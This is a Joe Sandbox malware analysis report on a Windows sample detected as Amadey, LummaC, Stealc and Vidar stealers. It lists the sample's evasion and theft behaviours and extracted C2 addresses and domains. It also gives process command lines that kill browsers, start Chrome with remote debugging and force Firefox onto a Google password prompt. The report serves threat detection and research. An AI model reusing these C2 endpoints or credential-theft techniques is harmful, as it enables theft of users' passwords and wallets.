Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1574690
MD5:197f7a10814e446ee3d649f2509b1608
SHA1:a459ec5320318e01318105d8e87e707ea480a4c7
SHA256:b4ab50c0c3a89046764d4b805c9c4cf5cbe6ae07aa2eddb5e445c11479a912ce
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Connects to many different private IPs (likely to spread or exploit)
Connects to many different private IPs via SMB (likely to spread or exploit)
Contain functionality to detect virtual machines
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Spreads via windows shares (copies files to share folders)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 197F7A10814E446EE3D649F2509B1608)
    • skotes.exe (PID: 648 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 197F7A10814E446EE3D649F2509B1608)
  • skotes.exe (PID: 980 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 197F7A10814E446EE3D649F2509B1608)
  • skotes.exe (PID: 7576 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 197F7A10814E446EE3D649F2509B1608)
    • 4508a44a11.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe" MD5: DFD5F78A711FA92337010ECC028470B4)
      • chrome.exe (PID: 8132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 6f9ea40b81.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe" MD5: 2A78CE9F3872F5E591D643459CABE476)
    • 955e8e90f4.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe" MD5: D314453DBA24064A56B135AEB166CDDA)
      • taskkill.exe (PID: 8028 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6300 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6992 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7124 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5232 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 3568 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • b6866cbf49.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe" MD5: BD77AFDA9F7533654B270DC7196689CF)
      • chrome.exe (PID: 6476 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2684 --field-trial-handle=2528,i,13978384918087299691,6631337269528066298,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • fa1ce2a324.exe (PID: 2304 cmdline: "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe" MD5: B0B3FC8A43169DD5D7E252EF410E48B5)
    • 09be480dc7.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Local\Temp\1014795001\09be480dc7.exe" MD5: C371507551999618FA1DCEB764333BC0)
    • bab5c1b6a6.exe (PID: 2248 cmdline: "C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 4420 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 3872 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3068 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 7932 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
    • e614d88998.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
      • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • e614d88998.exe (PID: 5900 cmdline: "C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe" MD5: 28E568616A7B792CAC1726DEB77D9039)
    • 4ZD5C3i.exe (PID: 4264 cmdline: "C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe" MD5: 42A8588CC82773CD223C42F8FE4BE91A)
  • firefox.exe (PID: 1856 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 6580 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 2208 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43d925f0-9685-4c56-9e32-dc32a554bcb7} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7a166f310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 7572 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -parentBuildID 20230927232528 -prefsHandle 3116 -prefMapHandle 3112 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0925204-3e74-4449-abae-cbe6b6d93c42} 6580 "\\.\pipe\gecko-crash-server-pipe.6580" 1c7b3908810 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 955e8e90f4.exe (PID: 3320 cmdline: "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe" MD5: D314453DBA24064A56B135AEB166CDDA)
    • taskkill.exe (PID: 2800 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • b6866cbf49.exe (PID: 4304 cmdline: "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe" MD5: BD77AFDA9F7533654B270DC7196689CF)
  • 955e8e90f4.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe" MD5: D314453DBA24064A56B135AEB166CDDA)
    • taskkill.exe (PID: 3224 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 4000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • b6866cbf49.exe (PID: 1284 cmdline: "C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe" MD5: BD77AFDA9F7533654B270DC7196689CF)
  • fa1ce2a324.exe (PID: 5248 cmdline: "C:\Users\user\AppData\Local\Temp\1014794001\fa1ce2a324.exe" MD5: B0B3FC8A43169DD5D7E252EF410E48B5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "stok"}

Threatname: LummaC

{"C2 url": ["dwell-exclaim.biz", "se-blurry.biz", "covery-mover.biz", "drive-connect.cyou", "dare-curbys.biz", "formy-spill.biz", "zinc-sneark.biz", "impend-differ.biz", "print-vexer.biz"], "Build id": "FATE99--test"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000021.00000002.3470503446.0000000000701000.00000040.00000001.01000000.00000013.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            00000031.00000003.3579214333.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000031.00000003.3737049743.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  00000031.00000003.3747345437.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 55 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    1.2.skotes.exe.90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.2.skotes.exe.90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        0.2.file.exe.f30000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: New RUN Key Pointing to Suspicious Folder
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\955e8e90f4.exe
                          Sigma detected: Browser Started with Remote Debugging
                          Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1014790001\4508a44a11.exe, ParentProcessId: 7824, ParentProcessName: 4508a44a11.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8132, ProcessName: chrome.exe
                          Sigma detected: CurrentVersion Autorun Keys Modification
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1014792001\955e8e90f4.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\955e8e90f4.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:28.393127+010020283713Unknown Traffic192.168.2.449977104.21.35.43443TCP
                          2024-12-13T13:53:31.386872+010020283713Unknown Traffic192.168.2.449986172.67.139.78443TCP
                          2024-12-13T13:53:31.780501+010020283713Unknown Traffic192.168.2.449987104.21.35.43443TCP
                          2024-12-13T13:53:36.351248+010020283713Unknown Traffic192.168.2.450256172.67.139.78443TCP
                          2024-12-13T13:53:36.865285+010020283713Unknown Traffic192.168.2.450257104.21.35.43443TCP
                          2024-12-13T13:53:42.853342+010020283713Unknown Traffic192.168.2.450273104.21.35.43443TCP
                          2024-12-13T13:53:49.315135+010020283713Unknown Traffic192.168.2.450294104.21.35.43443TCP
                          2024-12-13T13:54:00.073321+010020283713Unknown Traffic192.168.2.450323104.21.35.43443TCP
                          2024-12-13T13:54:07.141813+010020283713Unknown Traffic192.168.2.450345104.21.35.43443TCP
                          2024-12-13T13:54:08.398157+010020283713Unknown Traffic192.168.2.450351172.67.139.78443TCP
                          2024-12-13T13:54:13.816837+010020283713Unknown Traffic192.168.2.450367172.67.139.78443TCP
                          2024-12-13T13:54:16.250203+010020283713Unknown Traffic192.168.2.450376104.21.35.43443TCP
                          2024-12-13T13:54:20.854618+010020283713Unknown Traffic192.168.2.450382172.67.139.78443TCP
                          2024-12-13T13:54:22.867908+010020283713Unknown Traffic192.168.2.450384104.21.35.43443TCP
                          2024-12-13T13:54:38.587777+010020283713Unknown Traffic192.168.2.450396172.67.139.78443TCP
                          2024-12-13T13:54:46.262733+010020283713Unknown Traffic192.168.2.450413172.67.139.78443TCP
                          2024-12-13T13:54:57.481567+010020283713Unknown Traffic192.168.2.450448172.67.139.78443TCP
                          2024-12-13T13:55:02.679513+010020283713Unknown Traffic192.168.2.450458172.67.139.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:29.307939+010020546531A Network Trojan was detected192.168.2.449977104.21.35.43443TCP
                          2024-12-13T13:53:33.259132+010020546531A Network Trojan was detected192.168.2.449987104.21.35.43443TCP
                          2024-12-13T13:53:33.448771+010020546531A Network Trojan was detected192.168.2.449986172.67.139.78443TCP
                          2024-12-13T13:53:37.092124+010020546531A Network Trojan was detected192.168.2.450256172.67.139.78443TCP
                          2024-12-13T13:54:23.966114+010020546531A Network Trojan was detected192.168.2.450384104.21.35.43443TCP
                          2024-12-13T13:55:04.529557+010020546531A Network Trojan was detected192.168.2.450458172.67.139.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:29.307939+010020498361A Network Trojan was detected192.168.2.449977104.21.35.43443TCP
                          2024-12-13T13:53:33.448771+010020498361A Network Trojan was detected192.168.2.449986172.67.139.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:33.259132+010020498121A Network Trojan was detected192.168.2.449987104.21.35.43443TCP
                          2024-12-13T13:53:37.092124+010020498121A Network Trojan was detected192.168.2.450256172.67.139.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:28.393127+010020581601Domain Observed Used for C2 Detected192.168.2.449977104.21.35.43443TCP
                          2024-12-13T13:53:31.780501+010020581601Domain Observed Used for C2 Detected192.168.2.449987104.21.35.43443TCP
                          2024-12-13T13:53:36.865285+010020581601Domain Observed Used for C2 Detected192.168.2.450257104.21.35.43443TCP
                          2024-12-13T13:53:42.853342+010020581601Domain Observed Used for C2 Detected192.168.2.450273104.21.35.43443TCP
                          2024-12-13T13:53:49.315135+010020581601Domain Observed Used for C2 Detected192.168.2.450294104.21.35.43443TCP
                          2024-12-13T13:54:00.073321+010020581601Domain Observed Used for C2 Detected192.168.2.450323104.21.35.43443TCP
                          2024-12-13T13:54:07.141813+010020581601Domain Observed Used for C2 Detected192.168.2.450345104.21.35.43443TCP
                          2024-12-13T13:54:16.250203+010020581601Domain Observed Used for C2 Detected192.168.2.450376104.21.35.43443TCP
                          2024-12-13T13:54:22.867908+010020581601Domain Observed Used for C2 Detected192.168.2.450384104.21.35.43443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:15.268462+010020446961A Network Trojan was detected192.168.2.449757185.215.113.4380TCP
                          2024-12-13T13:52:25.086542+010020446961A Network Trojan was detected192.168.2.449782185.215.113.4380TCP
                          2024-12-13T13:52:32.495543+010020446961A Network Trojan was detected192.168.2.449808185.215.113.4380TCP
                          2024-12-13T13:52:40.975250+010020446961A Network Trojan was detected192.168.2.449838185.215.113.4380TCP
                          2024-12-13T13:52:51.826734+010020446961A Network Trojan was detected192.168.2.449870185.215.113.4380TCP
                          2024-12-13T13:53:01.056826+010020446961A Network Trojan was detected192.168.2.449905185.215.113.4380TCP
                          2024-12-13T13:53:13.996798+010020446961A Network Trojan was detected192.168.2.449944185.215.113.4380TCP
                          2024-12-13T13:53:22.486687+010020446961A Network Trojan was detected192.168.2.449961185.215.113.4380TCP
                          2024-12-13T13:53:30.915284+010020446961A Network Trojan was detected192.168.2.449983185.215.113.4380TCP
                          2024-12-13T13:54:29.268000+010020446961A Network Trojan was detected192.168.2.450388185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:26.819611+010020581591Domain Observed Used for C2 Detected192.168.2.4537951.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:45.391909+010020442451Malware Command and Control Activity Detected185.215.113.20680192.168.2.449848TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:45.244670+010020442441Malware Command and Control Activity Detected192.168.2.449848185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:45.767131+010020442461Malware Command and Control Activity Detected192.168.2.449848185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:48.032867+010020442481Malware Command and Control Activity Detected192.168.2.449848185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:25.886269+010020442471Malware Command and Control Activity Detected116.203.10.31443192.168.2.449783TCP
                          2024-12-13T13:52:46.085753+010020442471Malware Command and Control Activity Detected185.215.113.20680192.168.2.449848TCP
                          2024-12-13T13:54:44.216252+010020442471Malware Command and Control Activity Detected116.203.10.31443192.168.2.450402TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:28.558918+010020518311Malware Command and Control Activity Detected116.203.10.31443192.168.2.449795TCP
                          2024-12-13T13:54:47.138665+010020518311Malware Command and Control Activity Detected116.203.10.31443192.168.2.450412TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:25.886174+010020490871A Network Trojan was detected192.168.2.449783116.203.10.31443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:53:37.831411+010020480941Malware Command and Control Activity Detected192.168.2.450257104.21.35.43443TCP
                          2024-12-13T13:54:08.149538+010020480941Malware Command and Control Activity Detected192.168.2.450345104.21.35.43443TCP
                          2024-12-13T13:54:15.092861+010020480941Malware Command and Control Activity Detected192.168.2.450367172.67.139.78443TCP
                          2024-12-13T13:54:46.964921+010020480941Malware Command and Control Activity Detected192.168.2.450413172.67.139.78443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:44.543745+010020442431Malware Command and Control Activity Detected192.168.2.449848185.215.113.20680TCP
                          2024-12-13T13:53:54.402610+010020442431Malware Command and Control Activity Detected192.168.2.450303185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:06.120407+010028561471A Network Trojan was detected192.168.2.449736185.215.113.4380TCP
                          2024-12-13T13:57:22.338664+010028561471A Network Trojan was detected192.168.2.450555185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:13.908213+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449738TCP
                          2024-12-13T13:54:26.880579+010028561221A Network Trojan was detected185.215.113.4380192.168.2.450383TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:10.581340+010028033053Unknown Traffic192.168.2.44974531.41.244.1180TCP
                          2024-12-13T13:52:16.734492+010028033053Unknown Traffic192.168.2.44976331.41.244.1180TCP
                          2024-12-13T13:52:26.558843+010028033053Unknown Traffic192.168.2.449789185.215.113.1680TCP
                          2024-12-13T13:52:33.970816+010028033053Unknown Traffic192.168.2.449814185.215.113.1680TCP
                          2024-12-13T13:52:42.903217+010028033053Unknown Traffic192.168.2.449840185.215.113.1680TCP
                          2024-12-13T13:52:53.652658+010028033053Unknown Traffic192.168.2.44987731.41.244.1180TCP
                          2024-12-13T13:53:02.582364+010028033053Unknown Traffic192.168.2.44991731.41.244.1180TCP
                          2024-12-13T13:53:15.865022+010028033053Unknown Traffic192.168.2.44994631.41.244.1180TCP
                          2024-12-13T13:53:24.150793+010028033053Unknown Traffic192.168.2.44996631.41.244.1180TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:52:48.744449+010028033043Unknown Traffic192.168.2.449848185.215.113.20680TCP
                          2024-12-13T13:53:13.117344+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:17.109153+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:19.663109+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:21.542915+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:27.429681+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:29.215731+010028033043Unknown Traffic192.168.2.449916185.215.113.20680TCP
                          2024-12-13T13:53:38.494748+010028033043Unknown Traffic192.168.2.450259185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-13T13:55:00.672116+010028438641A Network Trojan was detected192.168.2.450448172.67.139.78443TCP

